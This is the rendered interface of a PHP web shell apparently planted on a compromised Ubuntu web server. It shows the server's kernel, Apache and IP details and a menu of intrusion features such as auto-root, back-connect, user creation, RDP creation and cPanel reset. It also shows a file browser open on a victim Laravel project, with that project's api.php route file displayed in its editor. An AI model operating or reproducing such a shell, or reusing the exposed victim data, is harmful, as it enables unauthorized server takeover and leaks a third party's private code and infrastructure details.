Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
routes /
[ HOME SHELL ]
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
api.php
1.38
KB
-rw-r--r--
console.php
369
B
-rw-r--r--
samurai_activity.log
213
B
-rw-r--r--
web.php
115
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php declare(strict_types=1); use App\Http\Controllers\Api\V1\MediaController; use Illuminate\Http\Request; use Illuminate\Http\{JsonResponse, Response}; use Illuminate\Support\Facades\Route; Route::post( '/v1/upload', [MediaController::class, 'uploadTemporary'] ) ->middleware('auth:sanctum'); Route::get('/v1/check-me', function (Request $request) { $user = $request->user(); return new JsonResponse( data: [ 'id' => $user->id, 'first_name' => $user->last_name, 'last_name' => $user->first_name, 'patronymic' => "$user->patronymic", 'email' => $user->email, 'email_verified_at' => $user->email_verified_at->format('Y-m-d'), 'is_active' => $user->is_active, 'metadata' => [ 'created_at' => $user->created_at->format('Y-m-d H:i:s'), 'updated_at' => $user->updated_at->format('Y-m-d H:i:s'), ]], status: Response::HTTP_OK ); })->middleware('auth:sanctum'); include('api/auth.php'); include('api/payments.php'); include('api/dictionaries.php'); include('api/articles.php'); include('api/projects.php'); include('api/accounts.php'); include('api/organizations.php'); include('api/contragents.php'); include('api/cash-flow.php'); include('api/users.php'); include('api/models.php'); include('api/integrations.php');
Close